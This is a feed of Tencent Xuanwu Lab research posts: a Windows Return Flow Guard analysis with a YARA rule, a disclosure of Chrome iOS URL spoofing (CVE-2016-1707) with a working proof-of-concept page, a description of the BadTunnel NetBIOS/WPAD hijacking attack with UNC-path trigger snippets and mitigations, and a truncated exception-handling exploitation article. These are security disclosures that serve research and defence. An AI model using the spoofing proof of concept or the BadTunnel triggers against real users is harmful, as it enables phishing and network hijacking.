Papers – Tencent's Xuanwu Lab http://xlab.tencent.com/en Wed, 21 Dec 2016 08:35:57 +0000 en-US hourly 1 https://wordpress.org/?v=4.6 Return Flow Guard http://xlab.tencent.com/en/2016/11/02/return-flow-guard/ Wed, 02 Nov 2016 06:29:27 +0000 http://xlab.tencent.com/en/?p=137 Continue reading "Return Flow Guard"]]> [DannyWei, lywang, FlowerCode] of Tencent Xuanwu Lab

Here is a preliminary documentation of the RFG implementation. We will update it once we have new findings and corrections.

We analyzed the Return Flow Guard introduced in Windows 10 Redstone 2 14942, released on October 7, 2016.

1 PROTECTION METHODS

Microsoft introduced Control Flow Guard in Windows 8.1 to protect against malicious modification of indirect call function pointers. CFG checks the target function pointer before each indirect call. However, CFG cannot detect modification of the return address on stack, or Return Oriented Programming.
The newly added RFG effectively stops these kind of attacks by saving the return address to fs:[rsp] at the entry of each function, and compare it with the return address on stack before returning.
Enabling RFG require both compiler and operating system support. During compilation, the compiler instruments the file by reserving a certain number of instruction spaces in the form of nop instructions.
When the target executable runs on a supported operating system, the reserved spaces are dynamically replaced with RFG instructions to check function return addresses. Otherwise, these nop instructions will not interfere with normal execution flow of the program.
The difference between RFG and GS (Buffer Security Check) is that the stack cookie can be obtained by using information leak or brute forcing, the RFG return address is written to the Thread Control Stack out of reach of attackers. This significantly increased the difficulty of the attack.

2 CONTROL SWITCHES

2.1 MMENABLERFG GLOBAL VARIABLE

This variable is controlled by a registry value located at:

\Registry\Machine\SYSTEM\CurrentControlSet\Control\Session Manager\kernel
EnableRfg : REG_DWORD

2.1.1 Initialization

KiSystemStartup -> KiInitializeKernel -> InitBootProcessor -> CmGetSystemControlValues

2.2 IMAGE FILE CONTROL FLAG

Control flags are stored in the IMAGE_LOAD_CONFIG_DIRECTORY64 structure in PE file.
Flags in GuardFlag field indicate RFG support status.

#define IMAGE_GUARD_RF_INSTRUMENTED                    0x00020000 // Module contains return flow instrumentation and metadata
#define IMAGE_GUARD_RF_ENABLE                          0x00040000 // Module requests that the OS enable return flow protection
#define IMAGE_GUARD_RF_STRICT                          0x00080000 // Module requests that the OS enable return flow protection in strict mode

2.3 PROCESS CONTROL FLAG

2.3.1 Querying

The RFG status can be queried through Win32 API GetProcessMitigationPolicy.

typedef enum _PROCESS_MITIGATION_POLICY {
// ...
    ProcessReturnFlowGuardPolicy = 11
// ...
} PROCESS_MITIGATION_POLICY, *PPROCESS_MITIGATION_POLICY;

2.3.2 Structure Definition

typedef struct _PROCESS_MITIGATION_RETURN_FLOW_GUARD_POLICY {
    union {
        DWORD Flags;
        struct {
            DWORD EnableReturnFlowGuard : 1;
            DWORD StrictMode : 1;
            DWORD ReservedFlags : 30;
        } DUMMYSTRUCTNAME;
    } DUMMYUNIONNAME;
} PROCESS_MITIGATION_RETURN_FLOW_GUARD_POLICY, *PPROCESS_MITIGATION_RETURN_FLOW_GUARD_POLICY;

3 NEW MEMBERS IN PORTABLE EXECUTABLE FORMAT

3.1 IMAGE_LOAD_CONFIG_DIRECTORY64

RFG instrumented portable executables have added several new fields, 24 bytes in total.

ULONGLONG  GuardRFFailureRoutine; 
ULONGLONG  GuardRFFailureRoutineFunctionPointer; 
DWORD      DynamicValueRelocTableOffset;
WORD       DynamicValueRelocTableSection;

2 pointers (16 bytes):
Virtual Address of the _guard_ss_verify_failure function
Virtual address of the _guard_ss_verify_failure_fptr function pointer, which points to the _guard_ss_verify_failure_default function by default.

Information about the address table (6 bytes):
DynamicValueRelocTableOffset recording the offset of dynamic relocation table relative to the relocation table, and
DynamicValueRelocTableSection recorded the section index of the dynamic value relocation table.
The remaining bytes are reserved.

3.2 IMAGE_DYNAMIC_RELOCATION_TABLE

RFG instrumented portable executables have a new dynamic relocation table after the normal relocation table.

typedef struct _IMAGE_DYNAMIC_RELOCATION_TABLE {
    DWORD Version;
    DWORD Size;
//  IMAGE_DYNAMIC_RELOCATION DynamicRelocations[0];
} IMAGE_DYNAMIC_RELOCATION_TABLE, *PIMAGE_DYNAMIC_RELOCATION_TABLE;

typedef struct _IMAGE_DYNAMIC_RELOCATION {
    PVOID Symbol;
    DWORD BaseRelocSize;
//  IMAGE_BASE_RELOCATION BaseRelocations[0];
} IMAGE_DYNAMIC_RELOCATION, *PIMAGE_DYNAMIC_RELOCATION;

typedef struct _IMAGE_BASE_RELOCATION {
    DWORD   VirtualAddress;
    DWORD   SizeOfBlock;
//  WORD    TypeOffset[1];
} IMAGE_BASE_RELOCATION;
Symbol in IMAGE_DYNAMIC_RELOCATION indicates the stored entries are for function prologues or function epilogues, defined as follows:
#define IMAGE_DYNAMIC_RELOCATION_GUARD_RF_PROLOGUE 0x00000001
#define IMAGE_DYNAMIC_RELOCATION_GUARD_RF_EPILOGUE 0x00000002

The absolute address of an entry can be calculated from ImageBase + VirtualAddress + TypeOffset.

4 INSTRUCTION INSERTION

4.1 COMPILE TIME

4.1.1 Inserted Prologue Bytes (9 Bytes)

MiRfgNopPrologueBytes
xchg    ax, ax
nop     dword ptr [rax+00000000h]
4.1.2   Inserted Epilogue Bytes (Example, 15 Bytes)
retn
db 0Eh dup(90h)
retn

4.1.2 Inserted Epilogue Bytes (Example, 15 Bytes)

retn
db 0Eh dup(90h)
retn

To reduce overhead, the compiler also inserts a _guard_ss_common_verify_stub function. Instead of inserting nop bytes at the end of every function, the compiler simply ends most function with a jmp to this stub function. This stub function has nop bytes to be replaced with epilogue bytes by the kernel at runtime, and a retn instruction at the end.

__guard_ss_common_verify_stub proc near
retn
db 0Eh dup(90h)
retn
__guard_ss_common_verify_stub endp

4.2 RUNTIME

MiPerformRfgFixups performs the instruction replacement according to function information stored in IMAGE_DYNAMIC_RELOCATION_TABLE when new executable section is being created.

4.2.1 Replaced Prologue Bytes (9 Bytes)

The kernel uses MiRfgInstrumentedPrologueBytes to replace compiler inserted prologue bytes.

MiRfgInstrumentedPrologueBytes
mov     rax, [rsp]
mov     fs:[rsp], rax

4.2.2 Replaced Epilogue Bytes (15 Bytes)

The kernel uses MiRfgInstrumentedEpilogueBytes and _guard_ss_verify_failure function address recorded in to replace the compiler inserted epilogue bytes.

MiRfgInstrumentedEpilogueBytes
mov     r11, fs:[rsp]
cmp     r11, [rsp] 
jnz    

5 THREAD CONTROL STACK

To implement RFG, Microsoft introduced Thread Control Stack, and reused the fs segment register on x64 architecture. When RFG enabled process executes the mov fs:[rsp], rax instructions, fs segment register points to the current thread’s ControlStackLimit on the control stack, and write rax into rsp offset.
All user mode threads in one process are using different memory blocks within same Thread Control Stack. We can enumerate the virtual address descriptor tree of the process to obtain the _MMVAD structure that describes the process’s Thread Control Stack.

    typedef struct _MMVAD {
      /* 0x0000 */ struct _MMVAD_SHORT Core;
      union {
        union {
          /* 0x0040 */ unsigned long LongFlags2;
          /* 0x0040 */ struct _MMVAD_FLAGS2 VadFlags2;
        }; /* size: 0x0004 */
      } /* size: 0x0004 */ u2;
      /* 0x0044 */ long Padding_;
      /* 0x0048 */ struct _SUBSECTION* Subsection;
      /* 0x0050 */ struct _MMPTE* FirstPrototypePte;
      /* 0x0058 */ struct _MMPTE* LastContiguousPte;
      /* 0x0060 */ struct _LIST_ENTRY ViewLinks;
      /* 0x0070 */ struct _EPROCESS* VadsProcess;
      union {
        union {
          /* 0x0078 */ struct _MI_VAD_SEQUENTIAL_INFO SequentialVa;
          /* 0x0078 */ struct _MMEXTEND_INFO* ExtendedInfo;
        }; /* size: 0x0008 */
      } /* size: 0x0008 */ u4;
      /* 0x0080 */ struct _FILE_OBJECT* FileObject;
    } MMVAD, *PMMVAD; /* size: 0x0088 */

    typedef struct _MMVAD_SHORT {
      union {
        /* 0x0000 */ struct _RTL_BALANCED_NODE VadNode;
        /* 0x0000 */ struct _MMVAD_SHORT* NextVad;
      }; /* size: 0x0018 */
      /* 0x0018 */ unsigned long StartingVpn;
      /* 0x001c */ unsigned long EndingVpn;
      /* 0x0020 */ unsigned char StartingVpnHigh;
      /* 0x0021 */ unsigned char EndingVpnHigh;
      /* 0x0022 */ unsigned char CommitChargeHigh;
      /* 0x0023 */ unsigned char SpareNT64VadUChar;
      /* 0x0024 */ long ReferenceCount;
      /* 0x0028 */ struct _EX_PUSH_LOCK PushLock;
      union {
        union {
          /* 0x0030 */ unsigned long LongFlags;
          /* 0x0030 */ struct _MMVAD_FLAGS VadFlags;
        }; /* size: 0x0004 */
      } /* size: 0x0004 */ u;
      union {
        union {
          /* 0x0034 */ unsigned long LongFlags1;
          /* 0x0034 */ struct _MMVAD_FLAGS1 VadFlags1;
        }; /* size: 0x0004 */
      } /* size: 0x0004 */ u1;
      /* 0x0038 */ struct _MI_VAD_EVENT_BLOCK* EventList;
    } MMVAD_SHORT, *PMMVAD_SHORT; /* size: 0x0040 */

    typedef struct _RTL_BALANCED_NODE {
      union {
        /* 0x0000 */ struct _RTL_BALANCED_NODE* Children[2];
        struct {
          /* 0x0000 */ struct _RTL_BALANCED_NODE* Left;
          /* 0x0008 */ struct _RTL_BALANCED_NODE* Right;
        }; /* size: 0x0010 */
      }; /* size: 0x0010 */
      union {
        /* 0x0010 */ unsigned char Red : 1; /* bit position: 0 */
        /* 0x0010 */ unsigned char Balance : 2; /* bit position: 0 */
        /* 0x0010 */ unsigned __int64 ParentValue;
      }; /* size: 0x0008 */
    } RTL_BALANCED_NODE, *PRTL_BALANCED_NODE; /* size: 0x0018 */

    typedef struct _RTL_AVL_TREE {
      /* 0x0000 */ struct _RTL_BALANCED_NODE* Root;
    } RTL_AVL_TREE, *PRTL_AVL_TREE; /* size: 0x0008 */

    typedef struct _EPROCESS {
        …
        struct _RTL_AVL_TREE VadRoot;
        …
    }

We can use _EPROCESS.VadRoot to walk through the VAD tree. If _MMVAD.Core.VadFlags.RfgControlStack flag is set, the current _MMVAD describes the virtual memory address range of the thread control stack (StartingVpn, EndingVpn, StartingVpnHigh, EndingVpnHigh in _MMVAD.Core), defined as follows:

    typedef struct _MMVAD_FLAGS {
      struct /* bitfield */ {
        /* 0x0000 */ unsigned long VadType : 3; /* bit position: 0 */
        /* 0x0000 */ unsigned long Protection : 5; /* bit position: 3 */
        /* 0x0000 */ unsigned long PreferredNode : 6; /* bit position: 8 */
        /* 0x0000 */ unsigned long NoChange : 1; /* bit position: 14 */
        /* 0x0000 */ unsigned long PrivateMemory : 1; /* bit position: 15 */
        /* 0x0000 */ unsigned long PrivateFixup : 1; /* bit position: 16 */
        /* 0x0000 */ unsigned long ManySubsections : 1; /* bit position: 17 */
        /* 0x0000 */ unsigned long Enclave : 1; /* bit position: 18 */
        /* 0x0000 */ unsigned long DeleteInProgress : 1; /* bit position: 19 */
        /* 0x0000 */ unsigned long PageSize64K : 1; /* bit position: 20 */
        /* 0x0000 */ unsigned long RfgControlStack : 1; /* bit position: 21 */ 
        /* 0x0000 */ unsigned long Spare : 10; /* bit position: 22 */
      }; /* bitfield */
    } MMVAD_FLAGS, *PMMVAD_FLAGS; /* size: 0x0004 */

    typedef struct _MI_VAD_EVENT_BLOCK {
      /* 0x0000 */ struct _MI_VAD_EVENT_BLOCK* Next;
      union {
        /* 0x0008 */ struct _KGATE Gate;
        /* 0x0008 */ struct _MMADDRESS_LIST SecureInfo;
        /* 0x0008 */ struct _RTL_BITMAP_EX BitMap;
        /* 0x0008 */ struct _MMINPAGE_SUPPORT* InPageSupport;
        /* 0x0008 */ struct _MI_LARGEPAGE_IMAGE_INFO LargePage;
        /* 0x0008 */ struct _ETHREAD* CreatingThread;
        /* 0x0008 */ struct _MI_SUB64K_FREE_RANGES PebTebRfg;
        /* 0x0008 */ struct _MI_RFG_PROTECTED_STACK RfgProtectedStack;
      }; /* size: 0x0038 */
      /* 0x0040 */ unsigned long WaitReason;
      /* 0x0044 */ long __PADDING__[1];
    } MI_VAD_EVENT_BLOCK, *PMI_VAD_EVENT_BLOCK; /* size: 0x0048 */

    typedef struct _MI_RFG_PROTECTED_STACK {
      /* 0x0000 */ void* ControlStackBase;
      /* 0x0008 */ struct _MMVAD_SHORT* ControlStackVad;
} MI_RFG_PROTECTED_STACK, *PMI_RFG_PROTECTED_STACK; /* size: 0x0010 */

When a RFG protected thread is created, nt!MmSwapThreadControlStack sets the thread’s ETHREAD.UserFsBase. It uses MiLocateVadEvent to search for MMVAD to be set as UserFsBase.
It uses the following formula to calculate the ETHREAD.UserFsBase:

ControlStackBase = MMVAD.Core.EventList.RfgProtectedStack.ControlStackBase
ControlStackLimitDelta = ControlStackBase - (MMVAD.Core.StartingVpnHigh * 0x100000000 + MMVAD.Core.StartingVpn ) * 0x1000
ETHREAD.UserFsBase = ControlStackLimitDelta

Each thread has its own shadow stack range in Thread Control Stack. If the current thread uses range ControlStackBase ~ ControlStackLimit, then ControlStackLimit = KTHTREAD.StackLimit + ControlStackLimitDelta. So the actual value stored in UserFsBase is the offset of ControlStackLimit from StackLimit. When multiple threads access the shadow stack simultaneously, the actual address accessed is located at ETHREAD.UserFsBase + rsp.

6 RFG IN ACTION

We wrote a simple yara signature to identify RFG instrumented PE file.

rule rfg {
    strings:
        $pe = { 4d 5a }
        $a = { 66 90 0F 1F 80 00 00 00 00 }
        $b = { C3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 C3 }
        $c = { E9 ?? ?? ?? ?? 90 90 90 90 90 90 90 90 90 90 E9 }

    condition:
        $pe at 0 and $a and ($b or $c)
}

Usage:

yara64.exe -r -f rfg.yara %SystemRoot%

We can observe from the output that most system executable files are already RFG instrumented in this version of Windows.
Here we use IDA Pro and WinDbg to examine a RFG instrumented calc.exe.

.text:000000014000176C wWinMain
.text:000000014000176C                 xchg    ax, ax
.text:000000014000176E                 nop     dword ptr [rax+00000000h]

The entry point before runtime replacement

0:000> u calc!wWinMain
calc!wWinMain:
00007ff7`91ca176c 488b0424        mov     rax,qword ptr [rsp]
00007ff7`91ca1770 6448890424      mov     qword ptr fs:[rsp],rax

The entry point after runtime replacement

.text:00000001400025BC __guard_ss_common_verify_stub
.text:00000001400025BC                 retn
.text:00000001400025BD                 db 0Eh dup(90h)
.text:00000001400025CB                 retn

The common verify stub function before runtime replacement

0:000> u calc!_guard_ss_common_verify_stub
calc!_guard_ss_common_verify_stub:
00007ff7`91ca25bc 644c8b1c24      mov     r11,qword ptr fs:[rsp]
00007ff7`91ca25c1 4c3b1c24        cmp     r11,qword ptr [rsp]
00007ff7`91ca25c5 0f85f5000000    jne     calc!_guard_ss_verify_failure (00007ff7`91ca26c0)
00007ff7`91ca25cb c3              ret

The common verify stub function after runtime replacement

7 REFERENCES

Exploring Control Flow Guard in Windows 10 Jack Tang, Trend Micro Threat Solution Team
http://sjc1-te-ftp.trendmicro.com/assets/wp/exploring-control-flow-guard-in-windows10.pdf

]]>
CVE-2016-1707 Chrome Address Bar URL Spoofing on IOS http://xlab.tencent.com/en/2016/10/10/cve-2016-1707-chrome-address-bar-url-spoofing-on-ios/ Mon, 10 Oct 2016 03:18:36 +0000 http://xlab.tencent.com/en/?p=91 Continue reading "CVE-2016-1707 Chrome Address Bar URL Spoofing on IOS"]]> Address Bar URL Spoofing on IOS Chrome (CVE-2016-1707), I report the vulnerability to Google in June 2016. Spoofing URL vulnerability can be forged a legitimate Web site address. Attacker can exploit this vulnerability to launch phishing attack.


Affected version: Chrome < v52.0.2743.82, IOS < v10

0x01 Vulnerability Details

POC:

<script>

payload="PGJvZHk+PC9ib2R5Pg0KPHNjcmlwdD4NCiAgICB2YXIgbGluayA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2EnKTsNCiAgICBsaW5rLmhyZWYgPSAnaHR0cHM6Ly9nbWFpbC5jb206Oic7DQogICAgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChsaW5rKTsNCiAgICBsaW5rLmNsaWNrKCk7DQo8L3NjcmlwdD4=";

function pwned() {

    var t = window.open('https://www.gmail.com/', 'aaaa');
    t.document.write(atob(payload));
    t.document.write("<h1>Address bar says https://www.gmail.com/ - this is NOT https://www.gmail.com/</h1>");
}

</script>

<a href="https://hack.com::/"  target="aaaa" onclick="setTimeout('pwned()','500')">click me</a><br>

How the vulnerability happened? First click on the ‘click me’ link, The browser opens a new window called aaaa, this page loads the “https://hack.com::”, this address can be casually write. Continue running Pwned () after 500 microseconds , open the ‘https://www.gmail.com’ in the aaaa window, of course, this URL can be empty. Up to now, all the code is running well, and the next code is the core code to trigger the vulnerability.

base64 payload code:

<body></body>
<script>
    var link = document.createElement('a');
    link.href = 'https://gmail.com::';
    document.body.appendChild(link);
    link.click();
</script>

Begin loading ‘https://gmail.com::’ in aaaa window , happying, Chrome allows to load ‘https://gmail.com::’, and then chrome address as a pending entry. Because ‘https://gmail.com::’ is an invalid address, i think Chrome should jump to about:blank, but chrome commits pending entry (‘https://gmail.com::’) and promotes it as a last committed URL. At this point, the entire loading process is completed. A perfect Spoofing URL vulnerability was born.

Online demo:

http://xisigr.com/test/spoof/chrome/1.html

http://xisigr.com/test/spoof/chrome/2.html

0x02 Fixed

[IOS] Do not commit invalid URLs during web load.

[self optOutScrollsToTopForSubviews];


// Ensure the URL is as expected (and already reported to the delegate). - DCHECK(currentURL == _lastRegisteredRequestURL) + // If |_lastRegisteredRequestURL| is invalid then |currentURL| will be + // "about:blank". + DCHECK((currentURL == _lastRegisteredRequestURL) || + (!_lastRegisteredRequestURL.is_valid() && + _documentURL.spec() == url::kAboutBlankURL)) << std::endl << "currentURL = [" << currentURL << "]" << std::endl << "_lastRegisteredRequestURL = [" << _lastRegisteredRequestURL << "]"; // This is the point where the document's URL has actually changed, and // pending navigation information should be applied to state information. [self setDocumentURL:net::GURLWithNSURL([_webView URL])]; - DCHECK(_documentURL == _lastRegisteredRequestURL); + + if (!_lastRegisteredRequestURL.is_valid() && + _documentURL != _lastRegisteredRequestURL) { + // if |_lastRegisteredRequestURL| is an invalid URL, then |_documentURL| + // will be "about:blank". + [[self sessionController] updatePendingEntry:_documentURL]; + } + DCHECK(_documentURL == _lastRegisteredRequestURL || + (!_lastRegisteredRequestURL.is_valid() && + _documentURL.spec() == url::kAboutBlankURL)); + self.webStateImpl->OnNavigationCommitted(_documentURL); [self commitPendingNavigationInfo]; if ([self currentBackForwardListItemHolder]->navigation_type() ==

0x03 Discloure Timeline:

2016/6/22 Report to Google,https://bugs.chromium.org/

2016/6/22 Google assigned,Security_Severity-High

2016/7/14 Google reward $3000

2016/7/20 Google advisory disclosed,CVE-2016-1707

2016/10/2 Google allpublic disclosed

0x04 References

[1] https://googlechromereleases.blogspot.com/2016/07/stable-channel-update.html

[2] https://bugs.chromium.org/p/chromium/issues/detail?id=622183

[3] https://chromium.googlesource.com/chromium/src/+/5967e8c0fe0b1e11cc09d6c88304ec504e909fd5

]]>
BadTunnel – A New Hope http://xlab.tencent.com/en/2016/06/17/badtunnel-a-new-hope/ Fri, 17 Jun 2016 08:20:27 +0000 http://xlab.tencent.com/en/?p=88 Continue reading "BadTunnel – A New Hope"]]>

This article purposes a new attack model to hijack TCP/IP broadcast protocol across different network segment, named “BadTunnel”.

With this method, NetBIOS Name Service Spoofing can be achieved, regardless of the attacker and the victim is on the same or different network, the firewalls and NAT devices in between. All it need is the victim navigate to a malicious web page with IE or Edge, or open a specially crafted document, and the attacker can hijack the victim’s NetBIOS name query to spoof as print server or file server in the local network.

By hijacking the WAPD name, the attacker can hijack all network communications, including but not limited to usual web accesses, Windows Update service and Microsoft Crypto API Certificate revocation list updates. Once the hijack is successful, it is easy to achieve arbitrary execution of program on the target system by using Evilgrade [1].

This method is effective on all Windows versions before the June 2016 patch, and can be exploited through all Internet Explorer, Microsoft Edge, and Microsoft Office versions, and can also be exploited through third-party applications. In fact, BadTunnel attack can be conducted on anywhere that a file URI scheme or UNC path can be embedded. For example, if a shortcut’s icon path is pointed to the malicious file URI scheme or UNC path, the BadTunnel attack can be triggered at the moment the user sees it in the Windows Explorer, which means BadTunnel can also be exploited through web pages, emails, USB flash drives and many other ways. It can even impact Web servers and SQL servers [2].

(This article does not include all contents covered by the BadTunnel research, the remaining part will be released in my presentation “BadTunnel: How do I get Big Brother power” on BlackHat US 2016.)

0x00 Background

NetBIOS is an ancient protoco. In 1987, IETF released RFC 1001 and RFC 1002, which defined NetBIOS over TCP/IP or NBT for short. NetBIOS includes three services, among them the Name service NetBIOS-NS, or NBNS for short. NBNS can resolve local names by broadcasting in the LAN.

When trying to access \\Tencent\Xuanwu\Lab\tk.txt, NBNS will send a NBNS NB query to the broadcast address:

Who is “Tencent”?

Any host in LAN can respond to this request:

“Tencent” is at 192.168.2.9.

Then the victim’s computer will accept this response and tries to access \\192.168.2.9\XuanwuLab\tk.txt.

This mechanism is definitely not safe, but since LAN is usually treated as trusted network, this spoofing possibility is not considered as vulnerability – just like the ARP Spoofing.

WPAD (Web Proxy Auto-Discovery Protocol) is another ancient protocol with over 20 years of history. As the name suggests, it is used for automatically discover and configure system proxy. Almost all operating systems support WPAD, but only Windows enable it by default. According to this protocol, Windows tries to resolve the name http://WPAD/wpad.dat to retrieve proxy configuration script.

On Windows, the name “WPAD” is resolved by NBNS. As previously stated, any host can claim it is “WPAD” in a LAN. This is not secure but acceptable since the LAN is considered trusted network environment. Although WPAD hijacking has been found more than a decade ago and used by the Flame worm, it is not considered as security vulnerability – just like the ARP Spoofing.

NBNS is implemented on top of the UDP protocol, which is a stateless protocol. Firewalls, NAT devices and other network devices cannot distinguish which session the UDP packet belongs to, so they must allow the UDP packet on both directions.

NBNS name query uses the broadcast protocol, but like most other broadcast protocols, NBNS accept responses from outside the network segment. Which means, if 192.168.2.2 sends a request to 192.168.2.255, but 10.10.10.10 responds in time, the response will be accepted by 192.168.2.2. In some enterprise networks, this is required by the network topology.

0x01 Implementation

If we could send a fake response from outside the network segment when the name query is performed by the NBNS, it can still be accepted. Therefore, NBNS Spoofing across different network segment is possible, but with a few problems:

  1. Most hosts have firewall enabled, which makes it impossible to send data to the host. Even if there is no firewall, there is no way to directly send data from internet to intranet. Does that mean we can only do NBNS Spoofing to these systems that have public IP address and no firewall enabled?
  2. There is a DNS protocol look-alike encapsulated within the NBNS protocol, so it also includes a Transaction ID. Only packets with matching Transaction IDs are accepted.
  3. How do we know when to send the NBNS Spoofing packet, if the host outside the LAN cannot receive the NBNS NB query broadcast?

Fortunately, all these problems can be solved.

First, the Windows operating system only uses 137/UDP port for NBNS. “Only” means that the source and target ports are always 137/UDP. If an intranet host 192.168.2.2 is sending NBNS request to 10.10.10.10, it will look like this:

192.168.2.2:137 -> NAT:54231 -> 10.10.10.10:137

The response from 10.10.10.10 will look like this:

192.168.2.2:137 <- NAT:54231 <- 10.10.10.10:137

That is, the local firewalls on 192.168.2.2 or NAT, or any other intermediate network devices, must allow any UDP packet from 10.10.10.10:137 to 192.168.2.2:137 to pass through in a certain amount of time, if it allows the query at all. This opens up a dual direction UDP tunnel, hence the name BadTunnel:

192.168.2.2:137 <-> NAT:54231 <-> 10.10.10.10:137

One quick experiment to help you understand this tunnel:

Prepare two systems with firewall enabled, with IP address set to 192.168.2.2 and 192.168.3.3, respectively.

On 192.168.2.2, execute command “nbtstat -A 192.168.3.3”, it will fail.

On 192.168.3.3, execute command “nbtstat -A 192.168.2.2”, it will success.

On 192.168.2.2, execute “nbtstat -A 192.168.3.3” once again, it will success.

How can we make 192.168.2.2 send a NBNS request to 10.10.10.10? When Windows is trying to access a file URI scheme or UNC path with IP address, if the 139 and 445 port of the target is inaccessible – either timed out or been reset– the system will send a NBNS NBSTAT query to this IP address. There are numerous ways to make a system access a file URI scheme or UNC path.

The Microsoft Edge and Internet Explorer both try to resolve the file URI scheme or UNC path in the web page:

<img src=”\\10.10.10.10\BadTunnel”>

All types of Microsoft Office documents can have embedded file URI scheme or UNC path, the same is true for many third-party document types.

If we have a shortcut with icon path point to a UNC path, this UNC path is accessed once the shortcut is shown on the screen.

If the target is a web server, maybe only one HTTP request is needed:

http://web.server/reader.aspx?ID=\10.10.10.10\BadTunnel

The NBNS Transaction ID is not random but incremental. As we have noted previously, the NBNS sends a NBNS NB query when resolving a name; the system sends a NBNS NBSTAT query when failing to access a file URI scheme or UNC path. NBNS NB query and NBNS NBSTAT query not only uses the same 137/UDP port, but also shares the same Transaction ID counter. That is, when 192.168.2.2 fails to access \\10.10.10.10\BadTunnel, the NBNS NBSTAT query it send to 10.10.10.10 not only opens up a dual direction UDP tunnel, but also leaks the Transaction ID value to 10.10.10.10.

That is, a single NBNS NBSTAT query solved both problem 1 and 2. And the third problem is even easier to solve. Just like we can embed <img src=”\\10.10.10.10\BadTunnel”> in our web page, we can also embed:

<img src=”http://WPAD/wpad.dat” >

In this way, we can control the time the system sends the NBNS NB query to WPAD, so we can craft our response in time. Finally the system will cache the response to http://WPAD/wpad.dat in its web cache. Later, when the system is requesting http://WPAD/wpad.dat to set proxy configuration, it will retrieve from the web cache. At least for Windows 7, the spoofed http://WPAD/wpad.dat will persist after reboots, just like other web resources.

Even if Web cache is not in place, the NBNS has its own caching mechanism. With one successful NBNS Spoofing, the spoofed response will be cached for 10 minutes:

In the next 10 minutes the operating system itself will also try to resolve the WPAD name and access http://WPAD/wpad.dat to download proxy configurations, so it will get the spoofed response. Once the attacker has successfully hijacked the user’s network flow, he can periodically redirect certain HTTP requests to make the BadTunnel attack persistent:

HTTP/1.1 302 Found
Content-Type: text/html
Location: file://10.10.10.10/BadTunnel
Content-Length: 0

0x02 Conclusion

The BadTunnel attack described in this article is a serious security problem, and the root cause is not obvious to find. The following dependencies are required for the attack to be successful:

  1. UDP protocol is connectionless.
  2. Broadcast requests can accept response from outside the network segment.
  3. WPAD is enabled by default on Windows.
  4. Windows file APIs supports UNC path by default.
  5. When Windows fails to access a UNC path by connecting to 139 and 445 ports, a NBNS NBSTAT query will be performed.
  6. NBNS always uses the same port on the client and server side.
  7. NBNS Transaction ID uses a counter rather than a RNG.
  8. NBNS NBSTAT query and NBNS NB query shares the same counter.
  9. WPAD shares the same Web and NBNS cache with other applications in the system.

These designs do not seem to be a problem independently; some are even required. We certainly can’t blame UDP for connectionless. Even the NBNS Transaction ID is not randomly generated, this alone does not become security vulnerability. The NBNS NB mechanism was designed for the intranet, and any host in the intranet can receive the NBNS NB query broadcast packets. However, although seems not to be a problem independently, they become a massive vulnerability when work collaboratively. How can we find the next BadTunnel?

0x03 Mitigation Recommendations

Even if the MS16-063 and MS16-077 patch cannot be installed immediately, there are workarounds that can stop the BadTunnel attack.

For enterprises, they can drop the 137/UDP packets on perimeter firewalls.

For end users that do not need to access Windows network sharing services, NetBIOS over TCP/IP can be disabled:

For minimal compatibility impact, WPAD address can be pinned to 127.0.0.1 in %SystemRoot%System32driversetchosts, or the automatic proxy discovery can be disabled to prevent hijacking:

However, BadTunnel is not limited to WPAD, and this does not stop hijacking of other names.

0x04 A Little Disappointment

Using BadTunnel to hijack WPAD is possibly the Windows vulnerability that has the widest impact and most exploit channels in the history. It is also the only vulnerability that can target all versions of Windows with one exploit. It could have been more interesting.

Apple’s Mac OS also implemented NetBIOS, and supports UNC path in some cases. WPAD can also be manually enabled on it. However, due to the difference in the implementation details of NetBIOS protocol, this attack does not affect the Mac OS – it would be much cooler otherwise.

0x05 Refrences

[1] Evilgrade
https://github.com/infobyte/evilgrade/

[2] 10 Places to Stick Your UNC Path
https://blog.netspi.com/10-places-to-stick-your-unc-path/

[3] Web Proxy Auto-Discovery Protocol
http://tools.ietf.org/html/draft-ietf-wrec-wpad-01

[4] NetBIOS Over TCP/IP
https://technet.microsoft.com/en-us/library/cc940063.aspx

[5] Disable WINS/NetBT name resolution
https://technet.microsoft.com/en-us/library/cc782733(v=ws.10).aspx

[6] MS99-054, CVE-1999-0858
https://technet.microsoft.com/en-us/library/security/ms99-054.aspx

[7] MS09-008, CVE-2009-0093, CVE-2009-0094
https://technet.microsoft.com/en-us/library/security/ms09-008.aspx

[8] MS12-074, CVE-2012-4776
https://technet.microsoft.com/en-us/library/security/ms12-074.aspx

[9] MS16-063, CVE-2016-3213
https://technet.microsoft.com/en-us/library/security/ms16-063.aspx

[10] MS16-077, CVE-2016-3213, CVE-2016-3236
https://technet.microsoft.com/en-us/library/security/ms16-077.aspx

]]>
Exceptions in Exceptions – Abusing Special Cases in System Exception Handling to Achieve Unbelievable Vulnerability Exploitation http://xlab.tencent.com/en/2016/04/19/exception-in-exception/ Tue, 19 Apr 2016 08:21:21 +0000 http://xlab.tencent.com/en/?p=86 Continue reading "Exceptions in Exceptions – Abusing Special Cases in System Exception Handling to Achieve Unbelievable Vulnerability Exploitation"]]>

Memory Read / Write / Execute attributes are one of the most important part of system security. Usually it is mandatory to have writable attribute set before overwriting a block of memory, and executable attribute set before executing code in a block of memory, otherwise an exception is generated. However, there are some special cases in the Windows exception handling procedure that we can take advantage of. By abusing such exceptions, we could write to the unwritable, and execute the unexecutable.

0x01 Directly modify read-only memory locations

In my CanSecWest 2014 talk “ROPs are for the 99%” I introduced an interesting technique – by modifying some flag in JavaScript objects, we can disable the safe mode and let Internet Explorer (IE) load dangerous objects such as WScript.Shell, and execute arbitrary code without worrying about the DEP.

Modifying SafeMode flag isn’t the only way to let IE load dangerous objects.

Some parts of IE are actually implemented in HTML. These HTML code are usually stored in the resource section of ieframe.dll. for example, the print preview page is in res://ieframe.dll/preview.dlg, organize favorites page is in res://ieframe.dll/orgfav.dlg, page properties page is in res://ieframe.dll/docppg.ppg, and so on.

IE will create separate renderer and JavaScript engine instances for these HTML, but the SafeMode is disabled by default in these new JavaScript engine instances.

Therefore, we only need to insert our JavaScript code into the resource section of ieframe.dll, and trigger the corresponding IE functionality, the code will be executed as if it is part of the IE functionality in a SafeMode disabled JavaScript engine instance.

But the resource section of the PE file is read-only. If we use a write-what-where vulnerability to modify the resource of ieframe.dll, an access violation exception is generated:

